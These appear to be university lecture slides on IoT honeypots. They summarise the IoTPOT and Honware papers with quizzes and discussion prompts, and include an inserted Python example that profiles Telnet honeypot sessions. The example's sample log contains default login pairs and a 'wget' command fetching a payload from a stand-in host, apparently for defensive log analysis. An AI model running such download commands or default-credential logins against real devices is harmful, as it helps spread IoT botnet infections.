Lecture #5: IoT Honeypots (PowerPoint presentation)

  1. Lecture #5: IoT Honeypots Cristian Hesselman, Elmer Lastdrager, Ramin Yazdani, and Etienne Khan University of Twente | May 20, 2020

  2. Lab assignment
     • MUD descriptions: you’ll need to generate them yourselves, tools are available
     • IoT devices: you’ll need to work with the actual hardware, no emulations (unless as an extra)
     • Use IoT devices without a browser-like interface, such as light bulbs, audio speakers, doorbells
     • Do not use multi-purpose devices like tablets, phones, laptops
     • At least 2 IoT devices per group of 3 and at least 3 devices per group of 4
     • Etienne Khan available for assistance

  3. Paper summaries
     • You must have handed in your two summaries BEFORE this lecture
     • You can use the summaries during the oral exam (“open book”)
     • You cannot complete SSI without submitting 12 paper summaries!

  4. Interactive Lecture
     • Goal: enable you to learn from each other and further increase your understanding of the papers (contributes to preparing yourself for the oral exam)
     • Format:
        1. We’ll ask someone to provide their verbal summary of the paper
        2. 5-slide(-ish) summary by teachers (put any questions in the chat)
        3. Questions: discussion starters and fact questions
        4. Discussion (use your mic)
        5. We may ask someone specific to start the discussion
     • Experimental format resulting from the Corona pandemic, please provide feedback!

  5. Today’s papers are about measuring IoT botnets
     • [IoTPOT] Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow. “IoTPOT: Analysing the Rise of IoT Compromises”. 9th USENIX Workshop on Offensive Technologies (co-located with USENIX Sec ’15), WOOT ’15, Washington, DC. https://christian-rossow.de/publications/iotpot-woot2015.pdf
     • [Honware] Vetterl, Alexander, and Richard Clayton. “Honware: A virtual honeypot framework for capturing CPE and IoT zero days.” Symposium on Electronic Crime Research (eCrime). IEEE. 2019. https://www.cl.cam.ac.uk/~amv42/papers/vetterl-clayton-honware-virtual-honeypot-framework-ecrime-19.pdf

  6. “IoTPOT: Analysing the Rise of IoT Compromises”, 9th USENIX Workshop on Offensive Technologies (WOOT), 2015

  7. Darknet monitoring
     • 270.000 IP addresses
     • Connect back on TCP ports 23/80 & collect banners

  8. Darknet monitoring (2)

  9. Darknet monitoring (2)

  10. Quiz: Why is a darknet useful for IoT malware research?
     A: Malware runs better, because it’s from the dark side
     B: No legitimate traffic
     C: No legal problems because a darknet is not managed by any company
     D: It has residual trust from previous use

  11. IoTPOT
     • Running on 165 IP addresses, 5 weeks running time
     • Telnet attack stages: (1) Intrusion; (2) Infection; (3) Monetization. Remember Mirai?
     • Credentials tried in fixed/random order (stage 1)
     • 6 patterns of commands distinguished (stage 2)
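As an added example (not code from the IoTPOT paper or the lecture), a small classifier that applies the first two Telnet stages and the fixed/random credential-order distinction to a constructed honeypot log; the log format, the field names and the set of downloader commands are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample Telnet honeypot log (not from the paper): "<time> <src_ip> <session> LOGIN <user>:<pass> <OK|FAIL>" or "... CMD <shell command>".
SAMPLE_LOG = """\
10:00:01 198.51.100.7 s1 LOGIN root:12345 FAIL
10:00:02 198.51.100.7 s1 LOGIN admin:1234 OK
10:00:03 198.51.100.7 s1 CMD sh
10:00:05 198.51.100.7 s1 CMD wget http://203.0.113.5/x.bin
10:05:01 198.51.100.7 s2 LOGIN root:12345 FAIL
10:05:02 198.51.100.7 s2 LOGIN admin:1234 OK
10:05:03 198.51.100.7 s2 CMD sh
10:05:05 198.51.100.7 s2 CMD wget http://203.0.113.5/x.bin
11:00:01 203.0.113.9 s3 LOGIN admin:1234 FAIL
11:00:02 203.0.113.9 s3 LOGIN root:12345 FAIL
11:10:01 203.0.113.9 s4 LOGIN root:12345 FAIL
11:10:02 203.0.113.9 s4 LOGIN admin:1234 FAIL
"""
EVENT = re.compile(r"^\S+ (\S+) (\S+) (LOGIN|CMD) (.*)$")
DOWNLOADERS = {"wget", "tftp", "ftpget"}  # fetching a payload marks the infection stage (assumed marker set)

def parse_sessions(log):
    """Group events by (src_ip, session), in order; malformed lines are skipped."""
    sessions = defaultdict(list)
    for m in filter(None, map(EVENT.match, log.splitlines())):
        src, sid, kind, rest = m.groups()
        sessions[(src, sid)].append((kind, rest))
    return sessions

def stage_of(events):
    """Intrusion = credential guessing; infection = logged in and fetched a payload.
    Monetization (the bot's later DDoS/scanning) is only visible in the sandbox, not here."""
    logged_in = any(k == "LOGIN" and r.endswith(" OK") for k, r in events)
    fetched = any(k == "CMD" and r.split()[0] in DOWNLOADERS for k, r in events)
    return "infection" if logged_in and fetched else "intrusion"

def profile_sources(log):
    """Per source: stages seen, fixed vs random credential order across its sessions,
    and the distinct command sequences (IoTPOT grouped these into 6 patterns)."""
    by_src = defaultdict(list)
    for (src, _), events in parse_sessions(log).items():
        by_src[src].append(events)
    out = {}
    for src, sess in by_src.items():
        creds = {tuple(r.rsplit(" ", 1)[0] for k, r in ev if k == "LOGIN") for ev in sess}
        cmds = {tuple(r for k, r in ev if k == "CMD") for ev in sess} - {()}
        out[src] = {"stages": {stage_of(ev) for ev in sess},
                    "cred_order": "fixed" if len(creds) == 1 else "random",
                    "patterns": cmds}
    return out
```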

  12. ‘Coordinated intrusion’

  13. IoTPOT & IoTBOX

  14. Quiz: What would an operator of an IoTPOT honeypot need to do to support Hajime?
     A: Add support for MIPS CPU architecture
     B: Track DHT (P2P) communications
     C: Expose many vulnerabilities
     D: Run the honeypot in different subnets

  15. IoTBOX
     • Sandbox with 8 CPU architectures
     • Limit outgoing traffic to DNS/HTTP, 5 ppm
     • Telnet to dummy server

  16. Results

  17. Results

  18. Quiz: Most important next step?
     A: More CPU architectures
     B: Passthrough and monitor C&C traffic
     C: Standardized botnet profiles for sharing between organizations
     D: Running on real (IoT) hardware

  19. Key takeaways
     • IoT world heterogeneous => honeypots more complex
     • High-interaction needed to get useful results
     • Require many (!) IP addresses to catch scans

  20. Discussion
     ⇒ What is IoT about IoTPOT?
     ⇒ Ethical considerations in running a honeypot?
     ⇒ How would you improve IoTPOT?
     ⇒ Other means to achieve the same?

  21. Honware: A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days. Vetterl, A., & Clayton, R. (2019, November). Honware: A virtual honeypot framework for capturing CPE and IoT zero days. In Symposium on Electronic Crime Research (eCrime). IEEE.

  22. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● We’ve seen IoTPOT as a generic example, can we improve on that model?
        ○ Specialized honeypots can be built for known malware (leaked Mirai source code)
        ○ But this might not capture attack traffic of unknown derivatives (e.g. Yowai/Hakai)
     ● Malware engineers can easily scan the whole IPv4 Internet to look for vulnerable devices and quickly infect them.
     ● This means defenders need to scale fast too
        ○ IoTPOT → hardcoded answers (and limited sandbox); Firmadyne → not set up for network traffic; SIPHON → physical devices
     ● Using original firmware as a basis for honeypots

  23. Quiz 1: How long does it take to scan the whole IPv4 space?
     A. Around 5 minutes
     B. Around 60 minutes
     C. Around 1 day
     D. Around 7 days

  24. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● Using original firmware as a honeypot basis
        ○ Automated firmware extraction with Binwalk
        ○ Customizing the kernel to allow logging & emulating proprietary hardware
        ○ Signal interception (signals are a form of inter-process communication (IPC))
        ○ Module loading disabled
        ○ NVRAM is not available and thus has to be emulated
        ○ Network configuration (adding interfaces)
        ○ Emulation self-check (am I reachable via ping?)

  25. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  26. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● Not required, but fun:
     ● Reverse engineering my router's firmware with binwalk
        https://embeddedbits.org/reverse-engineering-router-firmware-with-binwalk/
     ● Playing with signals
        http://www.it.uu.se/education/course/homepage/os/vt18/module-2/signals/

  27. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● How does this system compare to the alternative (Firmadyne)?
     ● Out of 8387 available firmware images, 4650 could be successfully extracted (55.4%)
        ○ Possibly due to having weaker constraints on the size of the extracted image
     ● From the 4650 extracted firmware images, 1903 responded to ICMP traffic (40.9%). Firmadyne only achieved this for 460 firmware images (15.8%)
        ○ Likely due to the kernel customizations and the handling of crashes

  28. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  29. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  30. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● How does this system compare to the real deal (hardware in the wild)?
     ● Fingerprinting of honeypots is an ongoing concern

  31. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  32. Quiz 2: Hosting the honeypots in the cloud can aid attackers in the fingerprinting process
     A. True
     B. False

  33. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● Real world results: fast
        1. UPnPHunter took a research team 1 month to reverse engineer; Honware detected the complete attack within 24 hours
        2. DNS hijack, a previously unknown attack
        3. UPnPProxy
        4. Mirai variants, target port 80 (HTTP) instead of 23 (Telnet)
     ● Detected malware samples were unknown to the wider community (VirusTotal)

  34. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days

  35. A Virtual Honeypot Framework for Capturing CPE and IoT Zero Days
     ● “At the beginning we were not able to capture a valid sample as the honeypot needs to be able to simulate the above scenarios. We had to tweak and customize our honeypot quite a few times, then finally in Oct, we got it right and successfully tricked the botnet to send us the sample (we call it BCMUPnP_Hunter).”
        https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/
     ● Original slides by the authors of the paper:
        https://www.cl.cam.ac.uk/~amv42/papers/vetterl-clayton-honware-virtual-honeypot-framework-ecrime-19-slides.pdf

  36. Conclusion
     ● Honware uses real services/applications which are shipped with the device
        ○ In addition to that, the native configuration files are loaded
     ● Better than existing emulation strategies in all areas
        ○ Extraction, network reachability, listening services
     ● Capable of detecting vulnerabilities at scale
        ○ Rapid emulation cuts the attackers’ ability to exploit vulnerabilities for considerable time

  37. Discussion of honeypot frameworks
     1. What do you think of the proposed frameworks today? Would you change something and why?
     2. Let’s link this back to the lecture on governance and regulation: should governments only allow the sale of an IoT device if they can run the firmware on a testbench?

  38. Discussion & feedback
     Follow us: SIDN.nl, @SIDN, SIDN
     Next lecture: Wed May 27, 10:45-12:30. Topic: IoT edge security systems
